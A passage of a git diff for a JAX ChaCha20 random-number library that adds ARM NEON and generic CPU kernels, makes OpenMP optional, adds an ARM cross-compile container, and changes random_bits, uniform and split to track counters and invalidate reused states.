+ ${CMAKE_CURRENT_BINARY_DIR} ${CMAKE_CURRENT_SOURCE_DIR}/cmake_config/sse_test.cpp
+ COMPILE_DEFINITIONS "-msse"
+ )
+ if (SSE_COMPILE_SUCCESS)
+ add_compile_options($<$<COMPILE_LANGUAGE:CXX>:-msse>)
+ endif()
+ endif()
+
+ if (NOT SSE_COMPILE_SUCCESS)
+ try_run(NEON_RUN_SUCCESS NEON_COMPILE_SUCCESS
+ ${CMAKE_CURRENT_BINARY_DIR} ${CMAKE_CURRENT_SOURCE_DIR}/cmake_config/neon_test.cpp
+ )
+
+ if (NOT NEON_COMPILE_SUCCESS)
+ # could not compile neon intrinsics, maybe we need the compiler flag?
+ try_run(NEON_RUN_SUCCESS NEON_COMPILE_SUCCESS
+ ${CMAKE_CURRENT_BINARY_DIR} ${CMAKE_CURRENT_SOURCE_DIR}/cmake_config/neon_test.cpp
+ COMPILE_DEFINITIONS "-mfpu=neon"
+ )
+ if (NEON_COMPILE_SUCCESS)
+ add_compile_options($<$<COMPILE_LANGUAGE:CXX>:-mfpu=neon>)
+ endif()
+ endif()
+ endif()
+
+ if (SSE_COMPILE_SUCCESS)
+ set(cpu_arch_path "${CMAKE_CURRENT_LIST_DIR}/lib/intel/")
+ set(cpu_arch_def "ARCH_INTEL")
+ set(SSE_ENABLED "Yes")
+ if (NOT SSE_RUN_SUCCESS EQUAL 0)
+ message(WARNING "Can compile with Intel SSE instructions but failed a test run (cross-compiling?); will compile with SSE anyways - set FORCE_GENERIC to disable")
+ endif()
+ endif()
+
+ if (NEON_COMPILE_SUCCESS)
+ set(cpu_arch_path "${CMAKE_CURRENT_LIST_DIR}/lib/arm/")
+ set(cpu_arch_def "ARCH_ARM")
+ set(NEON_ENABLED "Yes")
+ if (NOT NEON_RUN_SUCCESS EQUAL 0)
+ message(WARNING "Can compile with ARM Neon instructions but failed a test run (cross-compiling?); will compile with Neon anyways - set FORCE_GENERIC to disable")
+ endif()
+ endif()
+
+endif()
+
+
+message("-- Detected architecture - " ${CMAKE_SYSTEM_PROCESSOR})
+
+message("-- SSE instructions enabled - ${SSE_ENABLED}")
+message("-- ARM Neon instructions enabled - ${NEON_ENABLED}")
# native kernels require pybind11; however, if it is installed from pip, it has issues
# in detecting the Python interpreter and libraries during CMake build in a conda env,
@@ -34,11 +98,16 @@ if(NOT EXISTS "${PROJECT_SOURCE_DIR}/extern/pybind11/CMakeLists.txt")
message(FATAL_ERROR "The pybind11 repository was not downloaded! Please run manually: git submodule update --init --recursive .")
endif()
-find_package(Python COMPONENTS Interpreter Development REQUIRED)
+find_package(Python3 COMPONENTS Interpreter Development REQUIRED)
add_subdirectory(extern/pybind11)
# find_package(pybind11 REQUIRED) # broken; does not use correct Python interpreter/libraries in a conda env
-find_package(OpenMP REQUIRED)
+find_package(OpenMP)
+if(OpenMP_CXX_FOUND)
+ add_compile_definitions(OPENMP_AVAILABLE)
+else()
+ message(WARNING "OpenMP not found - Compiling without, but you may see lower performance.")
+endif()
include_directories(${CMAKE_CURRENT_LIST_DIR}/lib)
@@ -46,15 +115,24 @@ pybind11_add_module(
native
${CMAKE_CURRENT_LIST_DIR}/lib/cpu_kernel.cpp
${CMAKE_CURRENT_LIST_DIR}/lib/python_bindings.cpp)
-target_link_libraries(native PUBLIC OpenMP::OpenMP_CXX)
+target_include_directories(native PRIVATE ${cpu_arch_path})
+target_compile_definitions(native PRIVATE ${cpu_arch_def})
+
+if(OpenMP_CXX_FOUND)
+ target_link_libraries(native PUBLIC OpenMP::OpenMP_CXX)
+endif()
if (BUILD_TESTING)
add_executable(cpu_kernel_tests
${CMAKE_CURRENT_LIST_DIR}/tests/lib/cpu_kernel_tests.cpp
${CMAKE_CURRENT_LIST_DIR}/lib/cpu_kernel.cpp)
target_include_directories(cpu_kernel_tests PRIVATE
- ${CMAKE_CURRENT_LIST_DIR}/lib/)
- target_link_libraries(cpu_kernel_tests PUBLIC OpenMP::OpenMP_CXX)
+ ${CMAKE_CURRENT_LIST_DIR}/lib/
+ ${cpu_arch_path})
+ target_compile_definitions(cpu_kernel_tests PRIVATE ${cpu_arch_def})
+ if (OpenMP_CXX_FOUND)
+ target_link_libraries(cpu_kernel_tests PUBLIC OpenMP::OpenMP_CXX)
+ endif()
endif()
include(CheckLanguage)
@@ -78,7 +156,11 @@ if (CMAKE_CUDA_COMPILER)
target_include_directories(gpu_kernel_tests PRIVATE
${CMAKE_CURRENT_LIST_DIR}/lib/)
target_link_libraries(gpu_kernel_tests PUBLIC OpenMP::OpenMP_CXX)
+ target_compile_definitions(gpu_kernel_tests PRIVATE ${cpu_arch_def})
set_property(TARGET gpu_kernel_tests PROPERTY CUDA_ARCHITECTURES 35)
+ if (OpenMP_CXX_FOUND)
+ target_link_libraries(gpu_kernel_tests PUBLIC OpenMP::OpenMP_CXX)
+ endif()
endif()
else()
message(WARNING "CUDA not found - building for CPU only!")
diff --git a/ChangeLog.txt b/ChangeLog.txt
index ce3787c..df20bea 100644
--- a/ChangeLog.txt
+++ b/ChangeLog.txt
@@ -1,19 +1,32 @@
+- 2.0.0-rc.2:
+ - Fix: OpenMP is no longer a strict requirement for installation.
+ - Added: chacha.native.openmp_accelerated, returns True if CPU kernels are parallelised using OpenMP.
+ - Added: Generic (not hardware-specific) CPU kernels as well as vectorized CPU kernels for ARM CPUs.
+ - Added: random.is_state_invalidated to check if a PRNGKey was invalidated.
+ - Changed: random.split now can perform nested splits only up to a limit and returns
+ an invalidated state if this limit is exceeded. This is to guarantee
+ unique states after each split derived from the same inital randomness state.
+ - Changed: random.random_bits now return a new rng key for subsequent calls to
+ produce randmoness as well as an error flag integer,
+ which is set if the input randomness state was invalidated or the
+ randomness counter overflows.
+ - Changed: random.uniform now returns all NaNs if the input randomness state
+ was invalidated or the randomness counter overflows. It also accepts additional
+ kwarg return_next_key that returns a new rng key.
+ - Removed: random.fold_in.
+- 1.2.0:
+ - Deprecated: random.fold_in.
- 1.1.1:
- Added: support for jax up to v0.3.13.
- 1.1.0:
- Added: support for multiple layers of vmap wraps for functions in chacha.random.
- Added: support for jax up to v0.3.1.
- 1.0.0:
+ - Added: Native implementations for ChaCha block function as JAX ops.
- Added: chacha.native.cuda_supported, returns True if cuda kernels were compiled.
- - Added: support for jax up to v0.2.27.
-- 1.0.0-rc.3:
- Added: wheels for Python 3.10.
-- 1.0.0-rc.2:
- - Added: support for jax v0.2.21 - v0.2.22.
+ - Added: support for jax up to v0.2.27.
- Removed: support for jax v0.2.10 - v0.2.11.
-- 1.0.0-rc.1:
- - Added: support for jax v0.2.15 - v0.2.20.
- - Added: Native implementations for ChaCha block function as JAX ops.
- 0.1.0-alpha.2:
- Fix: random.random_bits() no longer fails for empty shape.
- Added: support for jax v0.2.14.
diff --git a/README.md b/README.md
index dc57516..03f959f 100644
--- a/README.md
+++ b/README.md
@@ -28,6 +28,11 @@ The package currently exposes basic RNG functions using the same interface as `J
*Note*: `PRNGKey` instances of this ChaCha20-based RNG are not interoperable with those of `jax.random`, i.e., you cannot mix them.
+`random_bits` and (optionally) `uniform` return a new rng key resulting from advancing the counter field in the key provided to them
+according to the amount of randomness they were tasked to produce. This key may be used for subsequent calls to producing randomness,
+but CANNOT be used as an input for `split`.
+
+
**Security notice**: Versions prior to 2.0.0 may repeat random states via the `split` and `fold_in` functions and
therefore not produce sufficiently random outputs.
@@ -58,16 +63,23 @@ State construction and use:
## Installing
-For the latest stable version install from the `v1-stable` branch via `pip`:
+For the latest stable version install from the `stable` branch via `pip`:
+```
+pip install git+https://github.com/DPBayes/jax-chacha-prng@stable#egg=jax-chacha-prng
+```
+
+For the latest stable release of major version X, use the `vX-stable` branch, i.e.,
+for major version 2 use
```
-pip install git+https://github.com/DPBayes/jax-chacha-prng@v1-stable#egg=jax-chacha-prng
+pip install git+https://github.com/DPBayes/jax-chacha-prng@v2-stable#egg=jax-chacha-prng
```
Installation will compile CUDA kernels if the CUDA library is present on the system,
otherwise only CPU kernels will be built. To check whether CUDA kernels were
built and installed, you can check the return value of `chacha.native.cuda_supported()`.
-Pre-built binary wheels are also available alongside the releases on GitHub.
+Pre-built binary wheels are also available alongside the releases on GitHub, however,
+these are currently only available for the x86_64 platform.
### Note about JAX versions
@@ -84,7 +96,7 @@ JAX version known to be compatible with JAX-ChaCha-PRNG:
pip install .[compatible-jax]
```
-JAX-ChaCha-PRNG is currently known to work reliably with JAX versions 0.2.12 - 0.2.27 .
+JAX-ChaCha-PRNG is currently known to work reliably with JAX versions 0.2.12 - 0.3.17 .
We regularly check the compatible version range, but do not expect new versions of JAX to be immediately tested.
## Versioning
diff --git a/arm_container/Dockerfile b/arm_container/Dockerfile
new file mode 100644
index 0000000..9b6926b
--- /dev/null
+++ b/arm_container/Dockerfile
@@ -0,0 +1,23 @@
+# SPDX-License-Identifier: Apache-2.0
+# SPDX-FileCopyrightText: © 2022 Aalto University
+
+FROM ubuntu:jammy AS qemu-arm-base
+
+RUN sed -i 's/http/[arch=i386,amd64] http/g' /etc/apt/sources.list
+RUN echo "deb [arch=arm64] http://ports.ubuntu.com/ jammy main restricted" >> /etc/apt/sources.list
+RUN echo "deb [arch=arm64] http://ports.ubuntu.com/ jammy-updates main restricted" >> /etc/apt/sources.list
+
+RUN dpkg --add-architecture arm64
+RUN apt update && apt upgrade -y && apt install -y qemu binfmt-support qemu-user-static libc6:arm64
+
+RUN /bin/bash
+
+FROM qemu-arm-base
+
+RUN apt install -y gcc-aarch64-linux-gnu g++-aarch64-linux-gnu libc6-dev-arm64-cross cmake python3 python3-dev libpython3-dev:arm64
+RUN mkdir -p /work/build/ /work/src/
+ADD docker_main.sh /work/docker_main.sh
+RUN chmod +x /work/docker_main.sh
+WORKDIR /work
+
+ENTRYPOINT [ "/work/docker_main.sh" ]
diff --git a/arm_container/docker_main.sh b/arm_container/docker_main.sh
new file mode 100644
index 0000000..4d60967
--- /dev/null
+++ b/arm_container/docker_main.sh
@@ -0,0 +1,17 @@
+#!/bin/bash
+# SPDX-License-Identifier: Apache-2.0
+# SPDX-FileCopyrightText: © 2022 Aalto University
+
+cd /work/build
+cmake \
+ -DCMAKE_SYSTEM_NAME=Linux -DCMAKE_SYSTEM_PROCESSOR=aarch64 \
+ -DCMAKE_C_COMPILER=/usr/bin/aarch64-linux-gnu-gcc \
+ -DCMAKE_CXX_COMPILER=/usr/bin/aarch64-linux-gnu-g++ \
+ -DCMAKE_FIND_ROOT_PATH=/usr/aarch64-linux-gnu/ \
+ -DCMAKE_FIND_ROOT_PATH_MODE_PROGRAM=BOTH \
+ -DCMAKE_CROSSCOMPILING_EMULATOR="/usr/bin/qemu-aarch64-static;-L;/usr/aarch64-linux-gnu/" \
+ -DBUILD_TESTING=On \
+ -DFORCE_GENERIC=$FORCE_GENERIC \
+ -DCMAKE_BUILD_TYPE=Release ../src/
+make
+/usr/bin/qemu-aarch64-static -L /usr/aarch64-linux-gnu/ ./cpu_kernel_tests
\ No newline at end of file
diff --git a/chacha/cipher.py b/chacha/cipher.py
index d59d41c..943f8cc 100644
--- a/chacha/cipher.py
+++ b/chacha/cipher.py
@@ -73,12 +73,12 @@ def setup_state(
elif jax.lax.dtype(counter) != ChaChaStateElementType or jnp.size(counter) != ChaChaCounterSizeInWords:
raise ValueError("counter must be a single 32-bit unsigned integer!")
- key_bits = key_array.size * 4
- if key_bits == 16:
+ key_bytes = key_array.size * 4
+ if key_bytes == 16:
key_array = jnp.tile(key_array, 2)
key_array = key_array.reshape(2, 4) # type: ignore # numpy seems confused about this
inputs = jnp.hstack((counter, iv_array))
- state = ChaChaState(jnp.vstack((KEY_GEN_CONSTANTS[key_bits], key_array, inputs)))
+ state = ChaChaState(jnp.vstack((KEY_GEN_CONSTANTS[key_bytes], key_array, inputs)))
return state
diff --git a/chacha/native.pyi b/chacha/native.pyi
index a606f12..bd9050b 100644
--- a/chacha/native.pyi
+++ b/chacha/native.pyi
@@ -1,5 +1,5 @@
# SPDX-License-Identifier: Apache-2.0
-# SPDX-FileCopyrightText: © 2021 Aalto University
+# SPDX-FileCopyrightText: © 2022 Aalto University
from typing import Callable, Sequence, Any
@@ -9,3 +9,4 @@ XlaCustomCallGPU = Callable[[Any, Sequence[bytes], bytes, int], None]
def cpu_chacha20_block_factory() -> XlaCustomCallCPU: ...
def gpu_chacha20_block_factory() -> XlaCustomCallGPU: ...
def cuda_supported() -> bool: ...
+def openmp_accelerated() -> bool: ...
diff --git a/chacha/random.py b/chacha/random.py
index 6d7e794..b0830d3 100644
--- a/chacha/random.py
+++ b/chacha/random.py
@@ -10,8 +10,8 @@
The following invariants hold:
- The 256 bit key provides base randomness that is expanded by PRNG; it given by the user as seed to function `PRNGKey`
-- The 32 bit counter in a randomness state is always set to zero; randomness expander such as `random_bits` increment
- it internally to provide streams of randomness.
+- The 32 bit counter in a randomness state is always incremented by randomness expanders such as `random_bits`
+ to provide streams of randomness.
- The 96 bit IV is used for randomness state splits using the `split` function; splitting results in a new state
that maintains the same cipher key, a counter value of zero and a fresh IV derived from the previous IV in such
a way that the new IV is unique among all states derived from the same initial key state. An IV value of zero
@@ -70,7 +70,7 @@ def is_state_invalidated(rng_key: RNGState) -> bool:
@partial(jax.jit, static_argnums=(1, 2))
def random_bits(rng_key: RNGState, bit_width: int, shape: typing.Sequence[int])\
- -> typing.Tuple[jnp.ndarray, jnp.uint32]:
+ -> typing.Tuple[jnp.ndarray, RNGState, jnp.uint32]:
""" Generates an array containing random integers.
Note that this function enters a failure state if the `rng_key` is invalidated
@@ -79,13 +79,14 @@ def random_bits(rng_key: RNGState, bit_width: int, shape: typing.Sequence[int])\
of containing an array of random values.
Args:
- rng_key: The not-invalidated PRNGKey object from which to generate random bits.
+ rng_key: The not-invalidated RNGState object from which to generate random bits.
bit_width: The number of bits in each element of the output.
shape: The shape of the output array.
Returns:
A tuple containing
- array of the given shape containing uniformly random unsigned integers with the given bit width,
+ - the next RNGState after generating the requested amount of random bits (with the counter value advanced),
- an integer representing an array of error flags (see `ErrorFlag`)
"""
if bit_width not in _UINT_DTYPES:
@@ -106,13 +107,17 @@ def generate_block(c: RNGState) -> jnp.ndarray:
out = cc.serialize(blocks, dtype)
assert jnp.size(out) >= size
- counter_exceeded = cc.get_counter(rng_key) >= jnp.uint32(-num_blocks)
+ next_rng_key = cc.increase_counter(rng_key, num_blocks)
+
+ counter_exceeded = cc.get_counter(rng_key) >= cc.get_counter(next_rng_key) # detect wrap-around of counter
error_flags = jnp.uint32((is_state_invalidated(rng_key) << 1) ^ counter_exceeded)
out = out[:size].reshape(shape)
out = jnp.where(error_flags == 0, out, out ^ out)
- return out, error_flags
+ next_rng_key = jnp.where(error_flags == 0, next_rng_key, jnp.zeros_like(rng_key))
+
+ return out, next_rng_key, error_flags
@partial(jax.jit, static_argnums=(1,))
@@ -130,28 +135,28 @@ def _split(rng_key: RNGState, num: int) -> RNGState:
assert new_nonce_base.shape == (defs.ChaChaNonceSizeInWords,)
split_nesting_exceeded = (old_nonce[0] >= (1 << (32 - bitlength_num))) | jnp.all(old_nonce == 0)
+ state_previuosly_used = cc.get_counter(rng_key) > 0
def make_rng_key(i: int) -> RNGState:
nonce = jnp.concatenate((new_nonce_base[:defs.ChaChaNonceSizeInWords - 1], new_nonce_base[-1:] ^ i))
nonce *= (1 - split_nesting_exceeded) # set the nonce to 0 (invalid state) if split nesting limit is exceeded
+ nonce *= (1 - state_previuosly_used) # set the nonced to 0 (invalid state) if the state was already used to generate randomness
return cc.set_counter(cc.set_nonce(rng_key, nonce), 0)
return jax.vmap(make_rng_key)(jnp.arange(num, dtype=rng_key.dtype))
-# TODO: deprecate fold_in for v1.x update; release changed splitting as v2
-
-@partial(jax.jit, static_argnums=(1, 2))
+@partial(jax.jit, static_argnums=(1, 2, 5))
def _uniform(
rng_key: RNGState,
shape: typing.Tuple[int],
dtype: type,
minval: jnp.float_,
- maxval: jnp.float_
+ maxval: jnp.float_,
+ return_next_key: bool
) -> jnp.ndarray: # noqa:E121,E125
_check_shape("uniform", shape)
if not jnp.issubdtype(dtype, np.floating):
- print("encountered exc in _uniform")
raise TypeError("uniform only accepts floating point dtypes.")
minval = jax.lax.convert_element_type(minval, dtype)
@@ -164,7 +169,7 @@ def _uniform(
assert nbits in (16, 32, 64)
- bits, errors = random_bits(rng_key, nbits, shape)
+ bits, next_rng_key, errors = random_bits(rng_key, nbits, shape)
# The strategy here is to randomize only the mantissa bits with an exponent of
# 1 (after applying the bias), then shift and scale to the desired range. The
@@ -180,7 +185,10 @@ def _uniform(
jax.lax.reshape(floats * (maxval - minval) + minval, shape)
)
- return jnp.where(errors == 0, result, result * jnp.nan)
+ result = jnp.where(errors == 0, result, result * jnp.nan)
+ if return_next_key:
+ return result, next_rng_key
+ return result
def PRNGKey(seed: typing.Union[jnp.ndarray, int, bytes]) -> RNGState:
@@ -241,7 +249,8 @@ def uniform(
shape: typing.Sequence[int] = (),
dtype: np.dtype = jnp.float64,
minval: typing.Union[float, jnp.ndarray] = 0.,
- maxval: typing.Union[float, jnp.ndarray] = 1.
+ maxval: typing.Union[float, jnp.ndarray] = 1.,
+ return_next_key: bool = False
) -> jnp.ndarray: # noqa:E121,E125
"""Samples uniform random values in [minval, maxval) with given shape/dtype.
@@ -249,18 +258,20 @@ def uniform(
the output will be an array of the requested size, containing only NaN values.
Args:
- key: The PRNGKey.
+ key: The RNGState.
shape: An optional tuple of nonnegative integers representing the result shape.
dtype: An optional float dtype for the returned values (default float64).
- minval: An ptional minimum (inclusive) value broadcast-compatible with shape for the range (default 0).
+ minval: An optional minimum (inclusive) value broadcast-compatible with shape for the range (default 0).
maxval: An optional maximum (exclusive) value broadcast-compatible with shape for the range (default 1).
+ return_next_key: An optional boolean flag. If `True`, the function returns a new RNGState (with advanced counter).
Returns:
- A random array with the specified shape and dtype.
+ A random array with the specified shape and dtype if `return_next_key` is `False`.
+ A tuple consisting of the random array and a new RNGState if `return_next_key` is `True`.
"""
if not jax.dtypes.issubdtype(dtype, np.floating):
raise TypeError(f"dtype argument to `uniform` must be a float dtype, got {dtype}")
dtype = jax.dtypes.canonicalize_dtype(dtype)
shape = _canonicalize_shape(shape)
- return _uniform(key, shape, dtype, minval, maxval)
+ return _uniform(key, shape, dtype, minval, maxval, return_next_key)
diff --git a/chacha/version.py b/chacha/version.py
index 85ac9a6..d5812e4 100644
--- a/chacha/version.py
+++ b/chacha/version.py
@@ -1,10 +1,10 @@
# SPDX-License-Identifier: Apache-2.0
-# SPDX-FileCopyrightText: © 2021,2022 Aalto University
+# SPDX-FileCopyrightText: © 2022 Aalto University
MAJOR_VERSION = 2
MINOR_VERSION = 0
PATCH_VERSION = 0
-EXT_VERSION = ""
+EXT_VERSION = "rc.2"
EXT_VERSION_SUFFIX = f"-{EXT_VERSION}" if len(EXT_VERSION) > 0 else ""
diff --git a/lib/arm/cpu_kernel_arch.hpp b/lib/arm/cpu_kernel_arch.hpp
new file mode 100644
index 0000000..fcf39aa
--- /dev/null
+++ b/lib/arm/cpu_kernel_arch.hpp
@@ -0,0 +1,72 @@
+// SPDX-License-Identifier: Apache-2.0
+// SPDX-FileCopyrightText: © 2022 Aalto University
+
+#pragma once
+
+#include "../defs.hpp"
+#include <stdint.h>
+#include <utility>
+#include <arm_neon.h>
+
+
+template <uint num_positions>
+inline uint32x4_t rotate_vector_left(uint32x4_t vec)
+{
+ return vextq_u32(vec, vec, num_positions);
+}
+
+template <>
+inline uint32x4_t rotate_vector_left<0>(uint32x4_t vec)
+{
+ return vec;
+}
+
+struct StateRow
+{
+private:
+ uint32x4_t values;
+
+public:
+ StateRow() { }
+ StateRow(uint32x4_t vec) : values(std::move(vec)) { }
+ StateRow(const uint32_t row_values[ChaChaStateWordsPerRow]) : values(vld1q_u32(row_values)) { }
+
+ inline StateRow& operator+=(const StateRow other)
+ {
+ values = vaddq_u32(values, other.values);
+ return *this;
+ }
+
+ inline StateRow& operator^=(const StateRow other)
+ {
+ values = veorq_u32(values, other.values);
+ return *this;
+ }
+
+ inline StateRow& operator<<=(int num_bits)
+ {
+ values = vorrq_u32(
+ vshlq_n_u32(values, num_bits),
+ vshrq_n_u32(values, 32 - num_bits)
+ ); // (value << num_bits) ^ (value >> (32 - num_bits));
+ return *this;
+ }
+
+ template <uint num_positions>
+ inline StateRow rotate_elements_left() const
+ {
+ return StateRow(rotate_vector_left<num_positions>(values));
+ }
+
+ template <uint num_positions>
+ inline StateRow rotate_elements_right() const
+ {
+ return rotate_elements_left<(ChaChaStateWordsPerRow - num_positions) % ChaChaStateWordsPerRow>();
+ }
+
+ inline void unvectorize(uint32_t out_buffer[ChaChaStateWordsPerRow]) const
+ {
+ vst1q_u32(out_buffer, values);
+ }
+
+};
diff --git a/lib/cpu_kernel.cpp b/lib/cpu_kernel.cpp
index 8ef44fa..1ca5742 100644
--- a/lib/cpu_kernel.cpp
+++ b/lib/cpu_kernel.cpp
@@ -1,101 +1,106 @@
// SPDX-License-Identifier: Apache-2.0
-// SPDX-FileCopyrightText: © 2021 Aalto University
+// SPDX-FileCopyrightText: © 2022 Aalto University
#include "cpu_kernel.hpp"
-inline __m128i rotate_left(__m128i values, uint num_bits)
+VectorizedState::VectorizedState(StateRow a, StateRow b, StateRow c, StateRow d) : rows{a, b, c, d} { }
+
+VectorizedState::VectorizedState(const uint32_t state[ChaChaStateSizeInWords]) : rows{
+ StateRow(state + 0 * ChaChaStateSizeInRows),
+ StateRow(state + 1 * ChaChaStateSizeInRows),
+ StateRow(state + 2 * ChaChaStateSizeInRows),
+ StateRow(state + 3 * ChaChaStateSizeInRows)
+} { }
+
+void VectorizedState::unvectorize(uint32_t out_state[ChaChaStateSizeInWords]) const
{
- return _mm_xor_si128(
- _mm_slli_epi32(values, num_bits),
- _mm_srli_epi32(values, 32 - num_bits)
- ); // (value << num_bits) ^ (value >> (32 - num_bits));
+ for (uint i = 0; i < ChaChaStateSizeInRows; ++i)
+ {
+ rows[i].unvectorize(out_state + i * ChaChaStateSizeInRows);
+ }
}
-VectorizedState quarterround_sse(VectorizedState state)
+StateRow& VectorizedState::operator[](uint i)
{
- __m128i a = state[0];
- __m128i b = state[1];
- __m128i c = state[2];
- __m128i d = state[3];
- a = _mm_add_epi32(a, b); // a += b;
- d = _mm_xor_si128(d, a); // d ^= a;
- d = rotate_left(d, 16);
- c = _mm_add_epi32(c, d); // c += d;
- b = _mm_xor_si128(b, c); // b ^= c;
- b = rotate_left(b, 12);
- a = _mm_add_epi32(a, b); // a += b;
- d = _mm_xor_si128(d, a); // d ^= a;
- d = rotate_left(d, 8);
- c = _mm_add_epi32(c, d); // c += d;
- b = _mm_xor_si128(b, c); // b ^= c;
- b = rotate_left(b, 7);
- return VectorizedState(a, b, c, d);
+ return rows[i];
}
-void pack_diagonals(VectorizedState& out_state, VectorizedState in_state)
+VectorizedState& VectorizedState::operator+=(VectorizedState other)
{
- out_state[0] = rotate_elements_left<0>(in_state[0]);
- out_state[1] = rotate_elements_left<1>(in_state[1]);
- out_state[2] = rotate_elements_left<2>(in_state[2]);
- out_state[3] = rotate_elements_left<3>(in_state[3]);
+ for (uint i = 0; i < ChaChaStateSizeInRows; ++i)
+ {
+ rows[i] += other.rows[i];
+ }
+ return *this;
}
-void unpack_diagonals(VectorizedState& out_state, VectorizedState in_state)
+VectorizedState VectorizedState::operator+(VectorizedState other) const
{
- out_state[0] = rotate_elements_right<0>(in_state[0]);
- out_state[1] = rotate_elements_right<1>(in_state[1]);
- out_state[2] = rotate_elements_right<2>(in_state[2]);
- out_state[3] = rotate_elements_right<3>(in_state[3]);
+ VectorizedState result(*this);
+ result += other;
+ return result;
}
-VectorizedState double_round_sse(VectorizedState state)
+/// This implements what Bernstein calls a quarterround, but does so in a
+/// vectorized manner, i.e., it performs all quarterrounds over the
+/// state matrix's rows concurrently.
+VectorizedState round(VectorizedState state)
{
- state = quarterround_sse(state);
- pack_diagonals(state, state);
- state = quarterround_sse(state);
- unpack_diagonals(state, state);
-
- return state;
+ StateRow a = state[0];
+ StateRow b = state[1];
+ StateRow c = state[2];
+ StateRow d = state[3];
+ a += b;
+ d ^= a;
+ d <<= 16;
+ c += d;
+ b ^= c;
+ b <<= 12;
+ a += b;
+ d ^= a;
+ d <<= 8;
+ c += d;
+ b ^= c;
+ b <<= 7;
+ return VectorizedState(a, b, c, d);
}
-VectorizedState add_states_sse(VectorizedState x, VectorizedState y)
+void pack_diagonals(VectorizedState& out_state, VectorizedState in_state)
{
- VectorizedState out;
- for (uint i = 0; i < 4; ++i)
- {
- out[i] = _mm_add_epi32(x[i], y[i]);
- }
- return out;
+ out_state[0] = in_state[0].rotate_elements_left<0>();
+ out_state[1] = in_state[1].rotate_elements_left<1>();
+ out_state[2] = in_state[2].rotate_elements_left<2>();
+ out_state[3] = in_state[3].rotate_elements_left<3>();
}
-VectorizedState vectorize_state(const uint32_t state[16])
+void unpack_diagonals(VectorizedState& out_state, VectorizedState in_state)
{
- VectorizedState vec_state;
- for (uint i = 0; i < 4; ++i)
- {
- vec_state[i] = _mm_load_si128(&(reinterpret_cast<const __m128i*>(state)[i]));
- }
- return vec_state;
+ out_state[0] = in_state[0].rotate_elements_right<0>();
+ out_state[1] = in_state[1].rotate_elements_right<1>();
+ out_state[2] = in_state[2].rotate_elements_right<2>();
+ out_state[3] = in_state[3].rotate_elements_right<3>();
}
-void unvectorize_state(uint32_t out_state[16], VectorizedState vec_state)
+VectorizedState double_round(VectorizedState state)
{
- for (uint i = 0; i < 4; ++i)
- {
- _mm_store_si128(&(reinterpret_cast<__m128i*>(out_state)[i]), vec_state[i]);
- }
+ state = round(state);
+ pack_diagonals(state, state);
+ state = round(state);
+ unpack_diagonals(state, state);
+
+ return state;
}
-void chacha20_block_sse(uint32_t out_state[16], const uint32_t in_state[16])
+void chacha20_block(uint32_t out_state[16], const uint32_t in_state[16])
{
- VectorizedState vec_in_state = vectorize_state(in_state);
- VectorizedState vec_tmp_state = double_round_sse(vec_in_state);
+ VectorizedState vec_in_state(in_state);
+ VectorizedState vec_tmp_state = double_round(vec_in_state);
for (uint i = 0; i < ChaChaDoubleRoundCount - 1; ++i)
{
- vec_tmp_state = double_round_sse(vec_tmp_state);
+ vec_tmp_state = double_round(vec_tmp_state);
}
- vec_tmp_state = add_states_sse(vec_in_state, vec_tmp_state);
- unvectorize_state(out_state, vec_tmp_state);
+ vec_tmp_state += vec_in_state;
+ vec_tmp_state.unvectorize(out_state);
}
void cpu_chacha20_block(void* out_buffer, const void** in_buffers)
@@ -103,10 +108,12 @@ void cpu_chacha20_block(void* out_buffer, const void** in_buffers)
uint32_t num_states = *reinterpret_cast<const uint32_t*>(in_buffers[0]);
const uint32_t* in_states = reinterpret_cast<const uint32_t*>(in_buffers[1]);
uint32_t* out_state = reinterpret_cast<uint32_t*>(out_buffer);
+ #ifdef OPENMP_AVAILABLE
#pragma omp parallel for
+ #endif
for (uint32_t i = 0; i < num_states; ++i)
{
uint32_t offset = ChaChaStateSizeInWords * i;
- chacha20_block_sse(out_state + offset, in_states + offset);
+ chacha20_block(out_state + offset, in_states + offset);
}
}
diff --git a/lib/cpu_kernel.hpp b/lib/cpu_kernel.hpp
index b58d2b5..87dd845 100644
--- a/lib/cpu_kernel.hpp
+++ b/lib/cpu_kernel.hpp
@@ -1,70 +1,60 @@
// SPDX-License-Identifier: Apache-2.0
-// SPDX-FileCopyrightText: © 2021 Aalto University
+// SPDX-FileCopyrightText: © 2022 Aalto University
#pragma once
-#include <stdint.h>
-#include <immintrin.h>
-
#include "defs.hpp"
+#include <cpu_kernel_arch.hpp>
-struct VectorizedState
-{
- __m128i values[4];
- VectorizedState() = default;
- VectorizedState(__m128i a, __m128i b, __m128i c, __m128i d) : values{a, b, c, d} { }
- __m128i& operator[](uint i) { return values[i]; }
-};
-__m128i rotate_left(__m128i values, uint num_bits);
-
-VectorizedState quarterround_sse(VectorizedState state);
-
-// Wrap _mm_shuffle_epi32 in a template to enforce that rotation_immediate
-// is always known at compile time.
-template <uint8_t rotation_immediate>
-inline __m128i _mm_shuffle_epi32_templated(__m128i val)
+inline StateRow operator+(StateRow left, StateRow right)
{
- return _mm_shuffle_epi32(val, rotation_immediate);
+ StateRow result(left);
+ result += right;
+ return result;
}
-// Rotate elements in a 4-vec
-template <uint num_positions>
-inline __m128i rotate_elements_left(__m128i vec)
+inline StateRow operator^(StateRow left, StateRow right)
{
- constexpr uint8_t rotation_lookup[4] = {
- 0b11100100,
- 0b00111001,
- 0b01001110,
- 0b10010011
- };
- constexpr uint8_t rotation_immediate = rotation_lookup[num_positions];
- // using the templated wrapper for _mm_shuffle_epi32, otherwise
- // gcc may be confused and decide to not treat rotation_immediate as
- // compile-time known in debug mode (-O0) for some reason, resulting
- // in errors from _mm_shuffle_epi32:
- return _mm_shuffle_epi32_templated<rotation_immediate>(vec);
+ StateRow result(left);
+ result ^= right;
+ return result;
}
-template <uint num_positions>
-inline __m128i rotate_elements_right(__m128i vec)
+inline StateRow operator<<(StateRow row, uint num_bits)
{
- return rotate_elements_left<(4 - num_positions) % 4>(vec);
+ StateRow result(row);
+ result <<= num_bits;
+ return result;
}
-void pack_diagonals(VectorizedState& out_state, VectorizedState in_state);
+template <>
+inline StateRow StateRow::rotate_elements_left<0>() const
+{
+ return *this;
+}
-void unpack_diagonals(VectorizedState& out_state, VectorizedState in_state);
-VectorizedState double_round_sse(VectorizedState state);
+struct VectorizedState
+{
+private:
+ StateRow rows[ChaChaStateSizeInRows];
-VectorizedState add_states_sse(VectorizedState x, VectorizedState y);
+public:
+ VectorizedState() = default;
+ VectorizedState(StateRow a, StateRow b, StateRow c, StateRow d);
+ VectorizedState(const uint32_t state[ChaChaStateSizeInWords]);
